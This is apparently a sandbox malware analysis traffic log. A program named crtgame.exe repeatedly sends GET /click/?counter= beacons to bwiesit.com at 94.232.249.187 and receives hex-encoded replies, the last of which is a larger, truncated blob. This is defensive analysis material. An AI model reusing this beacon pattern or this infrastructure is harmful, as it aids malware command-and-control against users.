                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.44981994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:28.814522982 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:30.164670944 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:29 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:30.272315025 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:30.770270109 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:30 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.44982594.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:31.003937006 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:32.348701000 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:32 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.44982894.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:32.580528021 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:33.923422098 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.44983494.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:34.161681890 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:35.504785061 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:35 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.44983994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:35.739190102 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:37.096827984 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.44984494.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:37.337073088 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:38.687474966 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:38 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.44984794.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:38.924432039 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:40.308319092 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:40 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.44985294.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:40.569071054 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:41.915117025 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:41 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.44985894.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:42.143084049 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:43.485140085 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:43 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.44986194.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:43.725328922 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:45.064199924 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:44 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.44986594.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:45.299034119 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:46.669008970 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:46 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.44987094.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:46.910093069 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:48.257534981 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:48 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:48.366138935 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:48.858058929 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:48 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.44987694.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:49.095870972 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:50.475550890 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:50 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:50.589442015 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:51.087025881 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:50 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:51.194185019 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:51.699235916 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:51 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.44988394.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:51.923937082 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:53.286915064 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:53 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.44988794.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:53.517733097 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:54.907599926 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:54 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.44989394.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:55.143764973 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:56.492563009 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.44989594.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:56.720815897 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:58.068844080 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.44989994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:58.299087048 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:59.653589964 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.44990594.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:59.895632982 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:09:01.284673929 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:09:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.44990994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:09:01.520328045 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:09:02.868812084 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:09:02 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.44991394.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:09:03.106534958 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:09:04.512526035 CET1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:09:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 35 39 34 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 65 65 64 61 63 66 34 34 66 38 36 35 37 39 65 33 63 31 66 39 37 32 66 38 39 35 62 39 38 39 63 33 63 32 39 36 35 34 37 62 63 32 30 32 30 37 31 64 64 39 66 36 65 33 33 38 64 38 63 64 31 33 34 35 61 35 32 38 66 64 30 30 32 66 63 30 66 63 36 64 31 34 32 62 32 32 36 33 39 30 31 35 32 63 33 35 36 32 32 64 62 35 66 66 64 33 37 38 61 34 36 35 39 61 66 32 65 65 61 62 62 31 38 39 30 35 39 34 36 61 33 62 31 61 31 38 33 66 32 64 37 61 34 35 35 65 62 66 32 62 32 38 36 64 64 32 37 33 66 39 63 31 32 62 61 32 65 65 37 37 36 31 33 61 35 62 39 37 65 61 66 30 38 64 61 61 39 37 65 39 39 30 61 61 61 63 33 38 63 33 65 34 62 39 36 62 39 64 31 32 63 39 63 65 66 38 31 65 38 30 35 66 38 34 37 64 66 34 64 32 65 63 34 32 65 62 30 39 30 32 [TRUNCATED]
